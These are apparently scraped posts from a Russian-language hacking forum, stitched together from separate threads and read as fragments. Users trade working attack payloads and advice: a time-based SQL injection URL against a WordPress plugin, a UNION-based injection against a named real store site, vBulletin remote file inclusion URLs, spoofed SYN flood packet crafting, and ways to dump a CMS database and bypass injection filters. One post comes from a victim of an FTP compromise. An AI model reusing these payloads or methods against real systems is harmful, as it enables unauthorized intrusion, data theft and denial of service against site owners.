неправда. У id =62 логин admin, логина administrator по умолчанию в Joomla нету. Начиная с версии 1.5
а у токенов всегда одинаковый формат? <input type="hidden" name="md5" value="1" /> или где-то будет по другому?
Сабж:Пытаюсь провести на уязвимом плагине wp SQL инъекцию, Плагин на exploit-db Poc: http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20 Я запрашиваю: 1)http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(100000,BENCHMARK(100000,md5(blesse()))),0)--%20 2)http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,sleep(30),0)--%20 Какой либо задержки в обоих случаях не последовало. Плагин на котором экспериментирую скачал от туда же(эксплоит помечен как верифицированный)mq=off. Значит где то я синтаксис нарушил?Или в чем может быть трабла?
Вывод можно добиться вот так _ttp://store.vampirefreaks.com/?cat_id=-11'+union+select+1,2,@@version,4,5+and+1='2 Забудь про havij - он не более чем дампер. Выведешь руками - потом сдампишь. А вообще тема для подобных вопросов тут
Мужики, кто знаком с Textpattern 4.0.5, подскажите в каком файле лежит шаблон. Доступа в админку нет, а через шелл не удается найти шаблон, уже все перерыл.
Syn flood Подскажите пожалуйста с таким вопросом: Syn flood, собираю пакет с случайным ip, если отправляю пакет с той же подсети что и сервер, тогда на сервере создается очередь полуоткрытых соединений, если же подсеть другая (внешний канал) тогда пакеты не доставляются. Чексумма правильная. Совсем не знаю в чем ошибка.
Угнали ФТП,- нужно проверить на шеллы Здравствуйте форумчане, такая ситуация: вирус поймал, угнал мои фтп пароли, повшивали редиректов и .htaccess и ифреймов в шаблоны. Я все сделал - обезопасил доступ, но нужна помощь в проверке на шелы итд. - хостинг ukraine ком юа. буду рад любой информации или предложениям!
Мужики, подскажите насчет vbulletin 4.0.2 Remote File Inclusion Кто-то пробовал? Все облазил-нашел только следующее # Exploit : # # http://www.site.com/path/includes/class_block.php?classfile=[shell code] # # http://www.site.com/path/vb/vb.php?filename=[shell code] # # http://www.site.com/path/packages/vbattach/attach.php?include_file=[shell code] Но не прокатывает на ни на цели, ни на локалке. Что я делаю не так? Или это фейк??? Если не сюда пишу-посоветуйте раздел, где спросить можно.
Есть frog cms, версию незнаю, не удалена папка install, есть рабочие способы получить админа - прочитть config.php , или хотя бы что-нибудь? с ресурса нужно слить все - и базу и шаблон.
В общем хочу слить бд с сайта и есть sql иньекция но там есть фильтр/ы, пробывал с ' но пишет "Hacking attempt!" Вот подскажите какие есть обойти фильтр
Как мы должны попытаться тебе помочь не видя инъекции ? Шанс что мы попадём пальцев в небо - очень не велик.